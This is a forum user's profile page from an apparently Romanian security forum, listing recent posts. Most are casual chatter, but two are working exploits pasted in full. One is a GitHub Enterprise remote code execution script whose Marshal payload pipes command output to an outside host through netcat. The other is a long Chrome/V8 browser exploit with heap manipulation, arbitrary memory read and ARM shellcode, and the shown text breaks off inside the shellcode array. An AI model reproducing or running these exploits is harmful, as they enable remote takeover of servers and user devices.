Jump to content

Massaro

Active Members
  • Content count

    81
  • Joined

  • Last visited

  • Days Won

    3

Massaro last won the day on November 30

Massaro had the most liked content!

Community Reputation

64 Excellent

About Massaro

  • Rank
    Registered user
  • Birthday 05/17/96

Recent Profile Visitors

1114 profile views
  1. salut

    Salut. Sa-mi bag pula ca tineam click apasat sa vad daca nu-i vreun text ascuns culoare pe culoare.
  2. Fun stuff

    Tre' sa arate cumva ca se plang de salarii =)).
  3. DaniB - Night Fire (Official Full Stream)

    Te-ai dezvirginat pe piesa asta de-o impartasesti cu noi?
  4. Ce carti mai cititi?

    Un pdf pentru "Level 7" (Ultimatum - ultimele zile ale unui razboi atomic) de Mordecai Roshwald? Nu gasesc nicaieri, am vrut s-o cumpar dar pe unde am gasit-o nu o mai au pe stoc.
  5. VREAȚI ÎMPRUMUT URGENT

    "Numarul numarul numarul". Mi-ai adus aminte de "Si... solutia? Care este solutia? Solutia, domnilor?" Mihaitza boss. Mars :)))))))))
  6. Nice shit to wake up to, huh? Frumos.
  7. The Little MAC Attack

    Daca aveti putin mai mult timp liber, aruncati un ochi peste asta. E prea lung sa-i dau copy paste aici. Good read.
  8. #!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "`id | nc orange.tw 12345`" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult" ''' marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult' payload = [ '', 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), marshal_code, '', '' ] payload = map(quote, payload) url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/' print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org" print '-'*10 + '\n' print url + '%0D%0A'.join(payload) print ''' Inserting WebHooks from: https://ghe-server/:user/:repo/settings/hooks Triggering RCE from: https://ghe-server/search?q=ggggg&type=Repositories ''' Sursa: https://www.exploit-db.com/exploits/42392/.
  9. Facultate UK

    Am un tovaras la University of Birmingham, chiar ii place si recomanda. Cel mai greu s-a descurcat la inceput cu banii, nu pot sa-ti spun mai multe. Da-le dracu de obtiuni. Eram pe cale sa postez "Doar eu il astept pe aelius sa se ia de gramatica lui?" si uite ca ai aparut deja.
  10. <html> // Source: https://github.com/secmob/pwnfest2016/ <script> function exploit(){ function to_hex(num){ return (num>>>0).toString(16); } function intarray_to_double(int_arr){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); uBuf[0]=int_arr[0]; uBuf[1]=int_arr[1]; return dBuf[0]; } function str_to_double(str){//leng of str must be 8 var dBuf = new Float64Array(1); var u8Buf = new Uint8Array(dBuf.buffer); for(var i=0;i<str.length;i++){ u8Buf[i] = str.charCodeAt(i); } return dBuf[0]; } function double_to_array(value){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); dBuf[0]=value; return uBuf; } function gc(){ for(var i=0;i<0x100000/16;i++){ new String; } } function getHiddenValue(){ var obj = {}; var oob = "/re/"; //oob = oob.replace("re","*".repeat(0x2000)); oob = oob.replace("re","*".repeat(0x100000)); var str = 'class x extends Array{'+oob+"}"; var fun = eval(str); Object.assign(obj,fun); return obj; } var obWin; function makeOobString(){ var hiddenValue = getHiddenValue(); var magicStr = "bbbb"; var arr=[]; var str = 'class x extends Array{}'; for(var i=0;i<str.length;i++){ arr[i]=str.charCodeAt(i); } var ob = new Array(0x200); ob.fill(0x31313131); gc(); gc(); str=String.fromCharCode.apply(null,arr); ob=ob.concat(0x32323232); var fun = eval(str); ob[2]=str; ob[3]=ob; Object.assign(fun,hiddenValue); var oobString = fun.toString(); gc(); gc(); print("begin search"); var subStr = oobString.substr(0,0x8000); var pos = subStr.indexOf(magicStr); print("end search"); if(pos==-1){ print("find magic failed"); postMessage(false); self.close(); print("unpossible"); throw "error"; }else{ print("find magic at "+pos); } oobString = oobString.substr(pos,ob.length*4); obWin=ob; return oobString; } var oobString = makeOobString(); print("get oob string successfully"); function print(){ console.log.apply(null,arguments); /*document.write('<p >'); document.write.apply(document,arguments); document.write("<p>");*/ } function str2arr(str,len){//len must be multile of 4 if(len===undefined) len = str.length; var u8a = new Uint8Array(len); for(var i=0;i<len;i++){ u8a[i] = str.charCodeAt(i); } return new Uint32Array(u8a.buffer); } function pArrayInHex(arr){ var result="<p style='font-size:8px'>"; for(var i=0;i<arr.length;i++){ result+=(arr[i]+0x100000000).toString(16).substr(-8); result+=" "; if(i%8==7) result+="<p style='font-size:8px'>"; } result+="<p>"; print(result); //alert(result); return result; } function pStrInHex(str){ //var result="<p style='font-size:8px'>"; var result="\n"; for(var i=0;i<str.length;i++){ var code = str.charCodeAt(i); result+=(code+0x100).toString(16).substr(-2); if(i%4==3) result+=" "; if(i%32==31) // result+="<p style='font-size:8px'>"; result+="\n"; } // result+="<p>"; result+="\n"; print(result); return result; } function getObjAddr(obj){ obWin[0]=obj; var value2= ((str2arr(oobString,4))[0]); return value2>>>0; } var getObj24BitsAddr = function(){ var smi=0; var code = 0; var i=0; //don't allocate heap object function getAddr(obj){ obWin[0]=obj; value=0; code = 0; i=0; for(i=2;i>=0;i--){ code = oobString.charCodeAt(i); value = code+value*256; } return value; } return getAddr; }(); var lengthInOldSpace = 0xfffffffc; var abarr=new Array(800); function sprayVM(){ var i=0; var j=0; try{ for(i=0;i<20;i++){ var u8 = new Uint8Array(0x10000000-0x500); abarr[i]=u8; } }catch(e){} try{ for(j=0;j<100;j++){ var u8 = new Uint8Array(0x8000000-0x500); abarr[i+j]=u8; } }catch(e){} print("allocate "+i+" 256M "+j+" 16M ") function getRandomInt(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } delete abarr[getRandomInt(0,i)]; } function getNewSpaceAddrs(){ /*var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%";*/ var objsInNewSpace = new Array(80); for(var i=0;i<objsInNewSpace.length;i++){ //var xx=escape(str); var xx = new Array(0x70000/4); objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; //使newspace更离散 new Uint8Array(0x100000-0x500); new Uint8Array(0x100000-0x500); } function compareNumbers(a, b) { return a - b; } objsInNewSpace = Array.from(new Set(objsInNewSpace)); objsInNewSpace = objsInNewSpace.sort(compareNumbers); return objsInNewSpace; } print("begin get new space address"); var objsInNewSpace = getNewSpaceAddrs(); while(objsInNewSpace.length<16){ objsInNewSpace = getNewSpaceAddrs(); print("new space addresses"); pArrayInHex(objsInNewSpace); } try{ sprayVM(); }catch(e){} var selectedTrunk = 0; var selectedStr = ""; function bruteForceFengShui(){ var huge_str = "x".repeat(0x100000-0x9000);//-0x9000 huge_str +="%"; var hold = new Array(100); //var holdaddress = new Array(100); for(var i=0;;i++){ var large = escape(huge_str); var addr = getObjAddr(large); //console.log(addr.toString(16) + " "+i); if(i<hold.length){ hold[i]=large; //holdaddress[i]=addr; } addr=(addr&0xfff00000)>>>0; addr = addr-0x100000; if(objsInNewSpace.indexOf(addr)!=-1){ selectedTrunk = addr; selectedStr = large; abarr.fill(1); hold.fill(1); //holdaddress.fill(1); break; } if(i===150){ /*i=0; print("tried 200 times"); abarr.fill(1); try{ sprayVM(); }catch(e){};*/ postMessage(false); close(); throw "exceed limits"; } } } bruteForceFengShui(); //to avoid allocate memory latter, initilize here var nextTrunk = selectedTrunk + 0x100000; //生成一块足够大的可读写内存 var huge_str = "eval('');"; //8000不能太大,太大会使new_space增大 for(var i=0;i<8000;i++) huge_str += 'a.a;'; huge_str += "return 10;"; var huge_func = new Function('a',huge_str); huge_func({}); function fillNewSpace(origObj){ //first object in new space at 0x8100, new spaces layout //0x40000 //0x37f00 //..... //0x40000 var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25 var gap = gap+"%"; //flat gap gap.substr(0,100); var fillstr = "%20a".repeat((0x40000-12)/4); fillstr = escape(fillstr); var addr=0; for(var i=0;i<0x100;i++){ addr = getObj24BitsAddr(origObj); if((addr&0xfffff)===0x8101) origObj=escape(gap); else origObj=unescape(fillstr); } } function findNewSpace(){ var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%"; for(var i=0;;i++){ var xx=escape(str); var straddr = getObjAddr(xx); addr=(straddr&0xfff00000)>>>0; if(addr===selectedTrunk){ print("good state "+straddr.toString(16)); break; } } } function myencode(str){ var arr = []; for(var i=0;i<str.length;i++){ if(i%2==1) arr.push(str.charCodeAt(i)); else{ arr.push(37);//% var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2); arr.push(hexstr.charCodeAt(0)); arr.push(hexstr.charCodeAt(1)); } } return String.fromCharCode.apply(null,arr); } var dArray = []; var index = (0x8100-36)*2; for(var i=0;i<0x20000/8;i++){ dArray[i]=str_to_double("%03x%03x"); } var occulen = 0; var i = 0; var savedChunk = new Uint8Array(0x8100); var hiddenValue = getHiddenValue(); var arr=[]; fillNewSpace(new String); findNewSpace(); var classStr = 'class x extends Array{}'; for(var i=0;i<classStr.length;i++){ arr[i]=classStr.charCodeAt(i); } var magicStr = String.fromCharCode(0x86,0x24); classStr=String.fromCharCode.apply(null,arr); var ab = new ArrayBuffer(0x1243); var fun = eval(classStr); Object.assign(fun,hiddenValue); var oobStr = fun.toString(); /*(gdb) x/20xw 0x5600c45c array buffer layout * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 */ //overwrite huge string as array buffer var abLengthIndex = oobStr.indexOf(magicStr); var strArrayBuffer = oobStr.substr(abLengthIndex-12,32); //replace the byteLength var LengthAddr = getObjAddr(lengthInOldSpace); var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); var strBase = "\x00\x00\x00\x00"; strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); strArrayBuffer = myencode(strArrayBuffer); for(var i=0;i<strArrayBuffer.length/8;i++){ var d = strArrayBuffer.substr(i*8,8); dArray[index/8+i] = str_to_double(d); } var classStrAddr = getObjAddr(classStr)>>>0; //set read position var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head //length control the length of unscaped string, generated string has 12 bytes head //left 0x1000*2 bytes to avoid gc var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); //save the the chunk head to be corrupted var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); for(var i =0;i<savedThunkStr.length;i++){ savedChunk[i] = savedThunkStr.charCodeAt(i); } var pos1=new String; var pos1addr = getObj24BitsAddr(pos1)-1; //0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); //minus the length of double array if(occulen<0x40000+16+8) throw "no enough room"; occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray if(occulen%4!==0) throw "length don't align"; var arrocc=new Array((occulen/4)); //set unescape write position var occDoubleArray = dArray.concat(); var b=unescape(subOobStr); //restore the corrupted chunk head var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); for(var i=0;i<savedChunk.length;i++){ u8[i] = savedChunk[i]; } print("long string allocated at "+classStrAddr.toString(16)); if(typeof(selectedStr)==="string"){ print("overwrite failed"); postMessage(false); close(); return; //throw "overwrite failed"; } var fakeab = selectedStr; print("faked array buffer byte length is "+fakeab.byteLength.toString(16)); var globaldv = new Uint32Array(fakeab); function read_uint32(from_address){ var u32 = globaldv[(from_address/4)>>>0]; return u32>>>0; } function read_uint8(from_address){ from_address = from_address>>>0; var index = (from_address/4)>>>0; var mask = from_address%4; var u32 = globaldv[index]; u32 = u32<<8*(3-mask); return u32>>>24; } function read_uint32_unalign(from_address){ var u32 = 0; for(var i=3;i>=0;i--){ var u8 = read_uint8(from_address+i); u32 = u32*0x100+u8; } return u32>>>0; } //rw to execute //get function point of v8::internal::Accessors::ReconfigureToDataProperty function getFixedFunctionPoint(fakeab){ var FunctionAddress = getObjAddr(Function); var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); var map = u32[0]; u32 = new Uint32Array(fakeab,map-1,0x1000); //instance descriptors var descriptors = u32[7]; u32 = new Uint32Array(fakeab,descriptors-1,0x1000); var lengthAccessorInfo = u32[6]; u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); var setterForeign = u32[4]; u32 = new Uint32Array(fakeab,setterForeign-1,0x1000); var functionPoint = u32[1]; return functionPoint-1; } var funPoint = getFixedFunctionPoint(fakeab); print("ReconfigureToDataProperty at"+funPoint.toString(16)); var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 print("chrome.apk base at "+point.toString(16)); function find(startAddr,len,pattern){ for(var i=0; i<(len-pattern.length); i++ ) { for(var j=0;j<pattern.length;j++){ var temp = read_uint8(startAddr+i+j); //print(temp.toString(16)); if(temp!=pattern[j]) break; } if(j==pattern.length) return startAddr+i; } print("find failed"); } var pattern_position=find(point,0x10000000,pattern); print("find pattern at "+to_hex(pattern_position)); function get_dest_from_blx(addr) { var val = read_uint32_unalign(addr); var s = (val & 0x400) >> 10; var i1 = 1 - (((val & 0x20000000) >> 29) ^ s); var i2 = 1 - (((val & 0x8000000) >> 27) ^ s); var i10h = val & 0x3ff; var i10l = (val & 0x7fe0000) >> 17; var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); return ((addr + 4) & ~3) + off; } function backup_original_code(start_address){ var backup_arr = []; set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ backup_arr[i]=u8arr[i]; } return backup_arr; } function restore_original_code(start_address,backup_arr){ set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ u8arr[i]=backup_arr[i]; } } huge_func({}); print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4))); var dlsym_addr = get_dest_from_blx(pattern_position-4); print("dlsym address is "+to_hex(dlsym_addr)); var huge_func_address = getObjAddr(huge_func)-1; print("huge func address is "+to_hex(huge_func_address)); for(var i=0;i<20;i++){ print(to_hex(read_uint32(huge_func_address+i*4))); } var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 print("huge func code entry is "+to_hex(huge_func_code_entry)); print(to_hex(read_uint32(huge_func_code_entry))); //var so_str= ""; var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe